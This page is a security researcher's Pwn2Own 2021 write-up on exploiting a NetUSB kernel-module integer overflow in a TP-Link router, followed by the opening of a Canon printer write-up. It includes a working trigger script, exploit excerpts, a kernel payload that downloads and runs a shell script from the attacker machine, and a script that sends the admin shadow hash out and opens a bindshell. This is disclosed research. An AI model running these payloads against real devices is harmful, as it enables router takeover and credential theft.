Normal view

There are new articles available, click to refresh the page.

Before yesterdayDiary of a reverse-engineer

Diary of a reverse-engineer
Competing in Pwn2Own 2021 Austin: Icarus at the ZenithAxel "0vercl0k" Souchet
26 March 2022 at 15:00

Competing in Pwn2Own 2021 Austin: Icarus at the Zenith

Diary of a reverse-engineer

By: Axel "0vercl0k" Souchet

26 March 2022 at 15:00

Introduction

In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.

I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.

Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.

This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.

Table of contents:

Target selections

At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.

At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.

Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.

The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.

As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.

Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽‍♂️. Special thanks to Cody for letting me know 😅!

Getting a shell on the target

After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.

After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.

But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.

After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:

Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:

Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.

Enumerating the attack surfaces

It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.

I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.

# ./busybox-mips netstat -platue
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 localhost:20002         0.0.0.0:*               LISTEN      4877/tmpServer
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 0.0.0.0:domain          0.0.0.0:*               LISTEN      4377/dnsmasq
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      5075/dropbear
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      4940/uhttpd
tcp        0      0 :::domain               :::*                    LISTEN      4377/dnsmasq
tcp        0      0 :::ssh                  :::*                    LISTEN      5075/dropbear
udp        0      0 0.0.0.0:20002           0.0.0.0:*                           4878/tdpServer
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           4377/dnsmasq
udp        0      0 0.0.0.0:54480           0.0.0.0:*                           -
udp        0      0 0.0.0.0:42998           0.0.0.0:*                           5883/conn-indicator
udp        0      0 :::domain               :::*                                4377/dnsmasq

At first sight, the following processes looked interesting: - the uhttpd HTTP server, - the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?), - the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.

Chasing ghosts

Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.

One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.

NetUSB shenanigans

There were two strange lines in the netstat output from above that did stand out to me:

tcp        0      0 0.0.0.0:33344           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:20005           0.0.0.0:*               LISTEN      -

Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.

This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.

Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.

After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  result = (void *)SoftwareBus_fillBuf(SbusConnection, v64, 4);
  if(result) {
    v64[0] = _bswapw(v64[0]); <----------------------- attacker controlled
    Payload_1 = mallocPageBuf(v64[0] + 9, 0xD0); <---- overflow
    if(Payload_1) {
      // ...
      if(SoftwareBus_fillBuf(SbusConnection, Payload_1 + 2, v64[0]))

I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:

int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if(SbusConnection)
    if(Buffer) {
      if(BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if ( GetLen <= 0 )
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if ( !BufferLen )
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      }
      else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  }
  else {
    // ...
    return 0;
  }
}

KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:

from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
  # Version
  s.send(b'\x56\x04')
  # Send random data
  s.send(aes_ctx.encrypt(b'a' * 16))
  _ = s.recv(16)
  # Receive & send back the random numbers.
  challenge = s.recv(16)
  s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
  length = len(name)
  assert length - 1 < 63
  s.send(le32(length))
  b = name
  if type(name) == str:
    b = bytes(name, 'ascii')
  s.send(b)

def create_connection(target, port, name):
  second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target, port))
  aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
  send_handshake(s, aes_ctx)
  send_bus_name(s, name)
  return s, aes_ctx

def main():
  parser = argparse.ArgumentParser('Zenith PoC2')
  parser.add_argument('--target', required = True)
  args = parser.parse_args()
  s, _ = create_connection(args.target, netusb_port, 'PoC2')
  s.send(le8(0xff))
  s.send(le8(0x21))
  s.send(le32(0xff_ff_ff_ff))
  p = b'\xab' * (0x1_000 * 100)
  s.send(p)

Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into _get_free_pages which is part of the Linux kernel. _get_free_pages allocates 2**n number of pages, and is implemented using what is called, a Binary Buddy Allocator. I wasn't familiar with that kind of allocator, and ended-up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.

Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation. The only limitation was that I could only trigger a mallocPageBuf call with a size in the following interval: [0, 8] because of the integer overflow. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke _get_free_pages.

Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.

I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.

int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if(!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}

Pretty funny right?

Booting NetUSB in QEMU

Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspections wasn't going to work. What are my options?

Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement with my current situation. I would be able to hook-up GDB, inspect the allocator state, and hopefully make progress.

Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.

I thought this was the end of my suffering but it was in fact not it. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I end up with a bootable image that has a configuration as close as possible from the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.

Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.

struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

over@panther:~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
root@debian-mips:~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
root@debian-mips:~# [   92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones): - I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing. - I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz. - You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets Andrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
        if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
          ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
            AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
            if (!AllocatedBuffer) {
                return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
            }
  // ...
            if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};

This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}

This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0

The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough.

I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up.

At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨.

When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again.
Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively.
The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hangout on Diary of reverse-engineering's Discord server with us!

Pwn2Own 2021 Canon ImageCLASS MF644Cdw writeup

Diary of a reverse-engineer

By: Nicolas "NK" Devillers ＆ Jean-Romain "JRomainG" Garnier ＆ Raphaël "_trou_" Rigo

11 June 2022 at 15:00

Introduction

Pwn2Own Austin 2021 was announced in August 2021 and introduced new categories, including printers. Based on our previous experience with printers, we decided to go after one of the three models. Among those, the Canon ImageCLASS MF644Cdw seemed like the most interesting target: previous research was limited (mostly targeting Pixma inkjet printers). Based on this, we started analyzing the firmware before even having bought the printer.

Our team was composed of 3 members:

Nicolas Devillers (@nikaiw),
Jean-Romain Garnier (@JRomainG),
Raphaël Rigo (@_trou_).

Note: This writeup is based on version 10.02 of the printer's firmware, the latest available at the time of Pwn2Own.

Table of contents:

Firmware extraction and analysis

Downloading firmware

The Canon website is interesting: you cannot download the firmware for a particular model without having a serial number which matches that model. This, as you might guess, is particularly annoying when you want to download a firmware for a model you do not own. Two options came to our mind:

Finding a picture of the model in a review or listing,
Finding a serial number of the same model on Shodan.

Thankfully, the MFC644cdw was reviewed in details by PCmag, and one of the pictures contained the serial number of the printer used for the review. This allowed us to download a firmware from the Canon USA website. The version available online at the time on that website was 06.03.

Predicting firmware URLs

